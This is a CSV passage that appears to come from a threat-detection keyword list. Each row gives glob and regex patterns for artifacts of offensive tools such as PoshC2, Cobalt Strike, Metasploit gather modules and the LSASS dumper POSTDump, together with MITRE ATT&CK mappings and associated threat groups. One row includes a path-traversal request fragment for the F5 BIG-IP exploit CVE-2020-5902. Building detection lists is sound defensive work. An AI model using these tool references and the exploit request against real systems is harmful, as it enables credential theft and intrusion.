"*posh-project -*",".{0,1000}posh\-project\s\-.{0,1000}","offensive_tool_keyword","poshc2","PoshC2 is a proxy aware C2 framework used to aid penetration testers with red teaming. post-exploitation and Lateral Movement. PoshC2 is primarily written in Python3 and follows a modular format to enable users to add their own modules and tools. allowing an extendible and flexible C2 framework. Out-of-the-box PoshC2 comes PowerShell/C# and Python implants with payloads written in PowerShell v2 and v4. C++ and C# source code. a variety of executables. DLLs and raw shellcode in addition to a Python2 payload. These enable C2 functionality on a wide range of devices and operating systems. including Windows. *nix and OSX.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","55086"
"*posh-server -*",".{0,1000}posh\-server\s\-.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","55087"
"*posh-server -*",".{0,1000}posh\-server\s\-.{0,1000}","offensive_tool_keyword","poshc2","PoshC2 is a proxy aware C2 framework used to aid penetration testers with red teaming. post-exploitation and Lateral Movement. PoshC2 is primarily written in Python3 and follows a modular format to enable users to add their own modules and tools. allowing an extendible and flexible C2 framework. Out-of-the-box PoshC2 comes PowerShell/C# and Python implants with payloads written in PowerShell v2 and v4. C++ and C# source code. a variety of executables. DLLs and raw shellcode in addition to a Python2 payload. These enable C2 functionality on a wide range of devices and operating systems. including Windows. *nix and OSX.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","55088"
"*posh-update *",".{0,1000}posh\-update\s.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","55089"
"*Possible Password found in Registry Key: *",".{0,1000}Possible\sPassword\sfound\sin\sRegistry\sKey\:\s.{0,1000}","offensive_tool_keyword","Rust-Malware-Samples","open source informations stealer in rust","T1003 - T1083 - T1114 - T1074","TA0006 - TA0009 - TA0005","N/A","N/A","Credential Access","https://github.com/Whitecat18/Rust-for-Malware-Development/tree/main/Malware-Samples","1","0","N/A","N/A","10","10","2123","53","2025-04-22T18:09:57Z","2024-02-12T16:55:06Z","55090"
"*POST */tmui/login.jsp/.. /tmui/locallb/workspace/fileSave.jsp*",".{0,1000}POST\s.{0,1000}\/tmui\/login\.jsp\/\.\.\s\/tmui\/locallb\/workspace\/fileSave\.jsp.{0,1000}","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tool","https://github.com/jas502n/CVE-2020-5902","1","0","N/A","N/A","N/A","4","373","111","2021-10-13T07:53:46Z","2020-07-05T16:38:32Z","55091"
"*POST *fileName=/tmp/1.txt&content=CVE-2020-5902*",".{0,1000}POST\s.{0,1000}fileName\=\/tmp\/1\.txt\&content\=CVE\-2020\-5902.{0,1000}","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tool","https://github.com/jas502n/CVE-2020-5902","1","0","N/A","N/A","N/A","4","373","111","2021-10-13T07:53:46Z","2020-07-05T16:38:32Z","55092"
"*post/windows/gather*",".{0,1000}post\/windows\/gather.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","55093"
"*post/windows/gather/credentials/vnc*",".{0,1000}post\/windows\/gather\/credentials\/vnc.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","1","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","55094"
"*post_breach_handler.py*",".{0,1000}post_breach_handler\.py.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1078 - T1135 - T1046 - T1087 - T1105","TA0007 - TA0008 - TA0001 - TA0011","N/A","N/A","Exploitation tool","https://github.com/guardicore/monkey","1","1","N/A","N/A","N/A","10","6779","798","2025-02-28T15:41:56Z","2015-08-30T07:22:51Z","55095"
"*post_ex_amsi_disable*",".{0,1000}post_ex_amsi_disable.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","N/A","10","10","657","88","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z","55096"
"*post_ex_keylogger*",".{0,1000}post_ex_keylogger.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","N/A","10","10","657","88","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z","55097"
"*post_ex_obfuscate*",".{0,1000}post_ex_obfuscate.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","N/A","10","10","657","88","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z","55098"
"*Post_EX_Process_Name*",".{0,1000}Post_EX_Process_Name.{0,1000}","offensive_tool_keyword","cobaltstrike","SourcePoint is a C2 profile generator for Cobalt Strike command and control servers designed to ensure evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Tylous/SourcePoint","1","1","N/A","N/A","10","10","1109","156","2025-04-16T17:15:04Z","2021-08-06T20:55:26Z","55099"
"*post_ex_smartinject*",".{0,1000}post_ex_smartinject.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","N/A","10","10","657","88","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z","55100"
"*post_ex_spawnto_x64*",".{0,1000}post_ex_spawnto_x64.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","N/A","10","10","657","88","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z","55101"
"*post_ex_spawnto_x86*",".{0,1000}post_ex_spawnto_x86.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","N/A","10","10","657","88","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z","55102"
"*POST_EXPLOIT_DIR*",".{0,1000}POST_EXPLOIT_DIR.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","55103"
"*post_exploitation.py*",".{0,1000}post_exploitation\.py.{0,1000}","offensive_tool_keyword","hackingtool","ALL IN ONE Hacking Tool For Hackers","T1059 - T1078 - T1105 - T1110 - T1566","TA0002 - TA0008 - TA0009 - TA0005 - TA0007","N/A","N/A","Exploitation tool","https://github.com/Z4nzu/hackingtool","1","1","N/A","N/A","N/A","10","52217","5629","2025-03-03T15:17:19Z","2020-04-11T09:21:31Z","55104"
"*POSTDump*PROCEXP.sys*",".{0,1000}POSTDump.{0,1000}PROCEXP\.sys.{0,1000}","offensive_tool_keyword","POSTDump","perform minidump of LSASS process using few technics to avoid detection","T1003","TA0006","N/A","Black Basta","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","1","N/A","N/A","10","4","327","37","2025-02-05T15:24:52Z","2023-09-13T11:28:51Z","55105"
"*PostDump.exe *",".{0,1000}PostDump\.exe\s.{0,1000}","offensive_tool_keyword","POSTDump","perform minidump of LSASS process using few technics to avoid detection.","T1003.001 - T1055 - T1564.001","TA0005 - TA0006","N/A","Black Basta","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","0","N/A","N/A","10","4","327","37","2025-02-05T15:24:52Z","2023-09-13T11:28:51Z","55106"
"*POSTDump.git*",".{0,1000}POSTDump\.git.{0,1000}","offensive_tool_keyword","POSTDump","perform minidump of LSASS process using few technics to avoid detection","T1003","TA0006","N/A","Black Basta","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","1","N/A","N/A","10","4","327","37","2025-02-05T15:24:52Z","2023-09-13T11:28:51Z","55107"
"*PostDump.ps1",".{0,1000}PostDump\.ps1","offensive_tool_keyword","POSTDump","perform minidump of LSASS process using few technics to avoid detection","T1003","TA0006","N/A","Black Basta","Credential Access","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","55108"
"*POSTDump\Postdump.cs*",".{0,1000}POSTDump\\Postdump\.cs.{0,1000}","offensive_tool_keyword","POSTDump","Another tool to perform minidump of LSASS process using few technics to avoid detection.","T1003 - T1055 - T1562.001 - T1218","TA0005 - TA0003 - TA0006","N/A","Black Basta","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","0","N/A","N/A","10","4","327","37","2025-02-05T15:24:52Z","2023-09-13T11:28:51Z","55109"
"*POSTDump\PROCEXP.sys*",".{0,1000}POSTDump\\PROCEXP\.sys.{0,1000}","offensive_tool_keyword","POSTDump","Another tool to perform minidump of LSASS process using few technics to avoid detection.","T1003 - T1055 - T1562.001 - T1218","TA0005 - TA0003 - TA0006","N/A","Black Basta","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","0","N/A","N/A","10","4","327","37","2025-02-05T15:24:52Z","2023-09-13T11:28:51Z","55110"
"*POSTDump-main*",".{0,1000}POSTDump\-main.{0,1000}","offensive_tool_keyword","POSTDump","perform minidump of LSASS process using few technics to avoid detection.","T1003.001 - T1055 - T1564.001","TA0005 - TA0006","N/A","Black Basta","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","1","N/A","N/A","10","4","327","37","2025-02-05T15:24:52Z","2023-09-13T11:28:51Z","55111"
"*PostExploitation.psm1*",".{0,1000}PostExploitation\.psm1.{0,1000}","offensive_tool_keyword","FruityC2","ruityC2 is a post-exploitation framework based on the deployment of agents on compromised machines","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 - TA0005","N/A","MuddyWater","C2","https://github.com/xtr4nge/FruityC2","1","1","N/A","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","208","67","2017-12-04T17:05:23Z","2017-01-11T17:27:45Z","55112"
"*postgres_default_pass.txt*",".{0,1000}postgres_default_pass\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","55113"
"*postgres_default_user.txt*",".{0,1000}postgres_default_user\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","55114"
"*POSTMiniDump.Data*",".{0,1000}POSTMiniDump\.Data.{0,1000}","offensive_tool_keyword","POSTDump","Another tool to perform minidump of LSASS process using few technics to avoid detection.","T1003 - T1055 - T1562.001 - T1218","TA0005 - TA0003 - TA0006","N/A","Black Basta","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","0","#content","N/A","10","4","327","37","2025-02-05T15:24:52Z","2023-09-13T11:28:51Z","55115"
"*POSTMiniDump.MiniDump*",".{0,1000}POSTMiniDump\.MiniDump.{0,1000}","offensive_tool_keyword","POSTDump","Another tool to perform minidump of LSASS process using few technics to avoid detection.","T1003 - T1055 - T1562.001 - T1218","TA0005 - TA0003 - TA0006","N/A","Black Basta","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","0","#content","N/A","10","4","327","37","2025-02-05T15:24:52Z","2023-09-13T11:28:51Z","55116"
"*POSTMiniDump.Utils*",".{0,1000}POSTMiniDump\.Utils.{0,1000}","offensive_tool_keyword","POSTDump","Another tool to perform minidump of LSASS process using few technics to avoid detection.","T1003 - T1055 - T1562.001 - T1218","TA0005 - TA0003 - TA0006","N/A","Black Basta","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","0","#content","N/A","10","4","327","37","2025-02-05T15:24:52Z","2023-09-13T11:28:51Z","55117"
"*PostMulitDomainSpider.py*",".{0,1000}PostMulitDomainSpider\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","55118"
